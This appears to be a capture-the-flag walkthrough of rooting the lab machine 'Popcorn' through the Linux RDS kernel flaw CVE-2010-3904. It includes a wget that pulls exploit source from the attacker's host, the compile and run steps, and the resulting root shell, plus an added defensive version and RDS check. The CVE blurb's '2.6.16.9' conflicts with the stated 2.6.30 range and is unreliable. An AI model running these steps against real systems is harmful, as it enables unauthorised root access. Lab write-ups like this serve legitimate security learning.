PEAS has discovered that the target system is vulnerable to CVE-2010-3904

CVE-2010-3904


A vulnerability classified as critical was found in Linux kernel 2.6.16.9 (operating system). It affects the function rds_page_copy_user. Manipulation with an unknown input leads to an input validation vulnerability. The CWE definition for the vulnerability is CWE-20: the product receives input or data, but it does not validate, or incorrectly validates, that the input has the properties required to process the data safely and correctly. It is known to affect confidentiality, integrity, and availability.
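As an added check (not part of the original writeup, and not the exploit's code), the following POSIX shell functions let a defender tell whether a host sits in this CVE's exposure window. They assume the affected kernels run from 2.6.30 (when RDS was added) up to but not including 2.6.36 (where rds_page_copy_user was fixed), and that RDS has been disabled with an `install rds /bin/true` line under /etc/modprobe.d; the directory is a parameter so the check can run against a constructed sample.

```shell
# Added check, not from the original writeup. Assumes the CVE-2010-3904
# window is kernel >= 2.6.30 (RDS introduced) and < 2.6.36 (fix shipped).

# Return 0 when a `uname -r` style release string falls in that window.
cve_2010_3904_kernel_in_range() {
    # keep the leading dotted numeric part: "2.6.32-21-generic" -> "2.6.32"
    ver=$(printf '%s\n' "$1" | sed 's/[^0-9.].*//')
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    # no third component (e.g. "2.6" or "3.0") -> treat patch level as 0
    [ "$rest" = "$patch" ] && patch=0
    patch=${patch%%.*}
    # single comparable integer: major*1000000 + minor*1000 + patch
    n=$(( ${major:-0} * 1000000 + ${minor:-0} * 1000 + ${patch:-0} ))
    [ "$n" -ge 2006030 ] && [ "$n" -lt 2006036 ]
}

# Return 0 when some *.conf under the given modprobe.d directory (default
# /etc/modprobe.d) carries an "install rds /bin/true" line, which stops the
# rds module from being autoloaded when a program opens an RDS socket.
rds_module_disabled() {
    dir=${1:-/etc/modprobe.d}
    grep -qsE '^[[:space:]]*install[[:space:]]+rds[[:space:]]+/bin/(true|false)' "$dir"/*.conf
}

# Self-test on constructed input (no real system files are read).
demo_cve_2010_3904_checks() {
    for k in 2.6.32-21-generic 2.6.36 3.2.0-4-amd64; do
        if cve_2010_3904_kernel_in_range "$k"; then
            echo "$k: inside the CVE-2010-3904 window"
        else
            echo "$k: outside the window"
        fi
    done
    tmp=$(mktemp -d)
    printf 'install rds /bin/true\n' > "$tmp/disable-rds.conf"
    rds_module_disabled "$tmp" && echo "rds autoload blocked in $tmp"
    rm -rf "$tmp"
}
demo_cve_2010_3904_checks
```

On a live host, run `cve_2010_3904_kernel_in_range "$(uname -r)"` and `rds_module_disabled` with no argument; a kernel inside the window with no install line is the exposed case.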

exploit (rds)


The exploit was found online. I will download the x86 version of the exploit.

Exploitation


www-data@popcorn:/dev/shm$ wget http://10.10.14.5:8000/CVE-2010-3904/rds.c 
--2023-02-02 14:36:28--  http://10.10.14.5:8000/CVE-2010-3904/rds.c
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 6871 (6.7K) [text/x-csrc]
saving to: `rds.c'
 
100%[======================================>] 6,871       --.-K/s   in 0.03s   
 
2023-02-02 14:36:28 (241 KB/s) - `rds.c' saved [6871/6871]

Delivery complete

www-data@popcorn:/dev/shm$ gcc rds.c -o rds

Compile

www-data@popcorn:/dev/shm$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc089b908
 [+] Resolved default_security_ops to 0xc075e2a0
 [+] Resolved cap_ptrace_traceme to 0xc02caf30
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
popcorn
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:b9:f3:bb brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.6/24 brd 10.10.10.255 scope global eth0
    inet6 dead:beef::250:56ff:feb9:f3bb/64 scope global dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:f3bb/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise